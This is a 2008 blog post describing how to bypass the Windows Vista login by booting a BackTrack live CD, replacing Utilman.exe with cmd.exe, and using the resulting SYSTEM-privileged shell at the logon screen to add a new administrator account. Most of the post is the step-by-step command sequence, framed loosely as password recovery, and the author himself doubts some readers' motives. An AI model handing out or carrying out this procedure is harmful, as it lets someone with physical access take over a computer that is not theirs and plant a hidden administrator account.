Hack Vista - Create a new admin account
August 3, 2008
Why hack Windows passwords when you can simply create yourself a new Administrator account?
In a previous post I showed how you can use an Ophcrack Live CD to crack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted me via my website saying “I forgot my password”, or “my kid locked himself out of his pc”. I’m unsure if that’s really the case or if they were just looking for a way to crack Windows passwords. However, if that is really the case there is potentially a much faster way to resolve your issue… just create a new Administrator account!
To create a new Administrator account you’ll want to grab a copy of the Offensive Security’s BackTrack Live CD which can be found here.
What is BackTrack?
BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions - Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.
- BackTrack Terminal Window
Here’s a quick and dirty way to make a new user account.
Boot into Backtrack and open a shell prompt:
- cd /mnt (change directory to mounted drives)
- ls (get the list of mounted drives)
- cd sda1 (sda1 is the main hard drive)
- cd Windows/ (change to the windows directory)
- cd System32/ (change to the system directory)
- mv Utilman.exe Utilman.old (backup original file)
- cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
- reboot
Once rebooted, at vista logon screen do the following:
- Press Windows key + U
- To invoke Utility Manager ( A.K.A. CMD.exe)
- Cmd.exe will spawn with ‘System’ privileges.
- c:\>net user S00perAdmin mypassword /add
- c:\>net localgroup administrators S00perAdmin /add
- Reboot and log in with your newly added Admin account
There ya go… now instead of needing to “crack” you “lost” password you can simply create a new Administrator account, login with that and then change the lost accounts password to what you want it to be.
- Comments
- 3 Comments »
- Categories
- Hacking, Privacy, Tech, Vista Tweaks, Windows
- Tags
- administrator account, backtrack, best security, crack password, create admin account, directory cd, free open source, hack, hack vista, Hacking, hard drive, kernels, linux distributions, mnt, mv, ophcrack live cd, penetration, system directory, terminal window, Vista, vista hacks, vista logon screen, Vista Tweaks, whax, windows directory, windows passwords
Comments rss
Trackback
